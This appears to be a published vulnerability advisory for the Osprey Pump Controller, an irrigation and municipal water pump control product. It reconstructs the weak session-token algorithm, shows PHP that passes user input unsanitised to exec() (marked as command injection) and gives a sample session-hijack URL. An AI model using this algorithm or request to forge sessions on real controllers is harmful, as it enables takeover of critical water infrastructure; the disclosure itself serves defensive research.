Osprey Pump Controller 1.0.1 Predictable Session Token / Session Hijack  
Vendor: ProPump and Controls, Inc.  
Product web page: |  
Affected version: Software Build ID 20211018, Production 10/18/2021  
Mirage App: MirageAppManager, Release [1.0.1]  
Mirage Model 1, RetroBoard II  
Summary: Providing pumping systems and automated controls for  
golf courses and turf irrigation, municipal water and sewer,  
biogas, agricultural, and industrial markets. Osprey: door-mounted,  
irrigation and landscape pump controller.  
Technology hasn't changed dramatically on pump and electric motors  
in the last 30 years. Pump station controls are a different story.  
More than ever before, customers expect the smooth and efficient  
operation of VFD control. Communicationsā€”monitoring, remote control,  
and interfacing with irrigation computer programsā€”have become common  
requirements. Fast and reliable accessibility through cell phones  
has been a game changer.  
ProPump & Controls can handle any of your retrofit needs, from upgrading  
an older relay logic system to a powerful modern PLC controller, to  
converting your fixed speed or first generation VFD control system to  
the latest control platform with communications capabilities.  
We use a variety of solutions, from MCI-Flowtronex and Watertronics  
package panels to sophisticated SCADA systems capable of controlling  
and monitoring networks of hundreds of pump stations, valves, tanks,  
deep wells, or remote flow meters.  
User friendly system navigation allows quick and easy access to all  
critical pump station information with no password protection unless  
requested by the customer. Easy to understand control terminology allows  
any qualified pump technician the ability to make basic changes without  
support. Similar control and navigation platform compared to one of the  
most recognized golf pump station control systems for the last twenty  
years make it familiar to established golf service groups nationwide.  
Reliable push button navigation and LCD information screen allows the  
use of all existing control panel door switches to eliminate the common  
problems associated with touchscreens.  
Global system configuration possibilities allow it to be adapted to  
virtually any PLC or relay logic controlled pump stations being used in  
the industrial, municipal, agricultural and golf markets that operate  
variable or fixed speed. On board Wi-Fi and available cellular modem  
option allows complete remote access.  
Desc: The pump controller's ELF binary Mirage_CreateSessionCode.x contains  
a weak session token generation algorithm that can be predicted and can aid  
in authentication and authorization bypass attacks. Further, session hijacking  
is possible due to MitM attack exploiting clear-text transmission of sensitive  
data including session token in URL. Session ID predictability and randomness  
analysis of the variable areas of the Session ID was conducted and discovered  
a predictable pattern. The low entropy is generated by using four IVs comprised  
of username, password, ip address and hostname.  
Tested on: Apache/2.4.25 (Raspbian)  
Raspbian GNU/Linux 9 (stretch)  
GNU/Linux 4.14.79-v7+ (armv7l)  
Python 2.7.13 [GCC 6.3.0 20170516]  
GNU gdb (Raspbian 7.12-6)  
PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - - @zeroscience  
Advisory ID: ZSL-2023-5745  
Advisory URL:  
sessionCode algorithm:  
for i in range(0, 80):  
foo = ord(userName[i]) + ord(userpassWord[i]) + ord(clientIP[i]) + ord(clientHost[i])  
bar = foo + 7  
if bar < 64 && bar > 57:  
bar = foo + 13  
while bar > 90:  
bar = bar - 43  
if bar < 64 && bar > 57:  
bar = bar - 37  
sessionCode[i] += chr(bar)  
if sessionCode[i] == chr('\a'):  
sessionCode[i] = 0  
index.php (+cmdinj):  
$dataRequest=$userName." ".$userPW." ".$client_IP." ".$client_HOST;  
$test=exec("Mirage_CreateSessionCode.x ". $dataRequest,$outData, $retVal);  
Session ID using user:password,ip,host  
Session ID using admin:password,ip,host  
First 10 bytes are the user/pass combo.  
Hijack session:  
GET /menu.php?menuItem=119&userName=user&sessionCode=QKC1DHM7EFCAEC49875@CPCLCEGAP5EKI